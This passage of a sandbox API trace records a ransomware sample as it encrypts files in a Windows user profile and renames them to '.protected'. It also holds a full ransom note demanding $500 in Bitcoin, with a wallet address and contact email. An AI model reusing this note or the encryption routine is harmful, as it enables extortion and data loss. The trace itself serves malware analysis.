1 [0092.045] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.045] CloseHandle (hObject=0xb4) returned 1 [0092.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.protected") returned 61 [0092.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.protected")) returned 1 [0092.047] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Windows") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="Program Files (x86)") returned -1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$Recycle.bin") returned 1 [0092.047] lstrcmpiW (lpString1="Downloads.lnk", lpString2="System Volume Information") returned -1 [0092.047] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.047] StrStrIW (lpFirst="Downloads.lnk", lpSrch=".protected") returned 0x0 [0092.047] lstrcmpW (lpString1="Downloads.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".rar") returned 0x0 [0092.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0092.048] StrStrW (lpFirst="Downloads.lnk", lpSrch=".zip") returned 0x0 [0092.048] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x3a1, lpOverlapped=0x0) returned 1 [0092.191] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x3a1, lpOverlapped=0x0) returned 1 [0092.192] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.192] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.192] CloseHandle (hObject=0xb4) returned 1 [0092.192] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.protected") returned 63 [0092.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.protected")) returned 1 [0092.193] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Windows") returned -1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="Program Files (x86)") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="$Recycle.bin") returned 1 [0092.193] lstrcmpiW (lpString1="RecentPlaces.lnk", lpString2="System Volume Information") returned -1 [0092.193] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.193] StrStrIW (lpFirst="RecentPlaces.lnk", lpSrch=".protected") returned 0x0 [0092.193] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0092.193] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.193] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.240] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0092.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.240] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".rar") returned 0x0 [0092.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0092.241] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".zip") returned 0x0 [0092.241] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0092.241] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.241] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x16b, lpOverlapped=0x0) returned 1 [0092.241] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.241] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.242] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.242] CloseHandle (hObject=0xb4) returned 1 [0092.242] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.protected") returned 66 [0092.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.protected")) returned 1 [0092.243] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.243] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.243] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RESTORE_FILES.txt") returned 57 [0092.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.243] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.243] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.244] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.244] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.244] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.244] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.244] CloseHandle (hObject=0xa4) returned 1 [0092.244] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Windows") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="Program Files (x86)") returned -1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="$Recycle.bin") returned 1 [0092.244] lstrcmpiW (lpString1="Local Settings", lpString2="System Volume Information") returned -1 [0092.244] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned 48 [0092.244] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0092.244] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0092.244] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0092.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.244] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Program Files") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0092.244] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 39 [0092.245] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0092.245] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0092.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0092.245] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.245] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.245] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.") returned 41 [0092.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.245] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0092.245] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0092.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.245] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.245] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.245] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\..") returned 42 [0092.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.245] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0092.245] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0092.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.245] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.245] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Windows") returned -1 [0092.245] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Program Files") returned -1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="Program Files (x86)") returned -1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="$Recycle.bin") returned 1 [0092.246] lstrcmpiW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="System Volume Information") returned -1 [0092.246] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrIW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".protected") returned 0x0 [0092.246] lstrcmpW (lpString1="5_XXGpiydtgUK-gisk6.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.246] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.246] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".txt") returned 0x0 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".rar") returned 0x0 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3") returned 63 [0092.246] StrStrW (lpFirst="5_XXGpiydtgUK-gisk6.mp3", lpSrch=".zip") returned 0x0 [0092.246] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f29, lpOverlapped=0x0) returned 1 [0092.247] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe0d7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f29, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f29, lpOverlapped=0x0) returned 1 [0092.247] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.247] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.247] CloseHandle (hObject=0xb4) returned 1 [0092.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3.protected") returned 73 [0092.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5_XXGpiydtgUK-gisk6.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5_xxgpiydtguk-gisk6.mp3.protected")) returned 1 [0092.248] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Windows") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Program Files") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="Program Files (x86)") returned -1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="$Recycle.bin") returned 1 [0092.248] lstrcmpiW (lpString1="BXLOb.mp3", lpString2="System Volume Information") returned -1 [0092.248] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrIW (lpFirst="BXLOb.mp3", lpSrch=".protected") returned 0x0 [0092.248] lstrcmpW (lpString1="BXLOb.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bxlob.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrW (lpFirst="BXLOb.mp3", lpSrch=".txt") returned 0x0 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrW (lpFirst="BXLOb.mp3", lpSrch=".rar") returned 0x0 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\BXLOb.mp3") returned 49 [0092.248] StrStrW (lpFirst="BXLOb.mp3", lpSrch=".zip") returned 0x0 [0092.248] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.249] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.249] 